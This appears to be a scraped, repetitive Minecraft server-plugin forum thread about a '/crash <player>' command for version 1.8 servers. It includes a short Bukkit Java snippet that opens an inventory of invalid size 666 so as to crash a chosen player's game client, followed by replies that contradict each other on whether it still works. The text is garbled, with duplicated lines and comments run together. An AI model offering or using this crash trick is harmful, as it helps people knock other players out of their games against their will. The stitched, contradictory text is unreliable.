It crashes the users game and and takes them off of MC.
Version 1.8+ (1.8.1,1.8.2,1.8.4,1.8.8,1.8.9) etc.
command /crash <player>
Version 1.8+ (1.8.1,1.8.2,1.8.4,1.8.8,1.8.9) etc.
command /crash <player>
Doesn't work anymorePlayer player = (Player)sender;
Inventory inventory = Bukkit.getServer().createInventory(player, 666);
player.openInventory(inventory);
I tested this code and it works correctly on my server lol.Doesn't work anymore
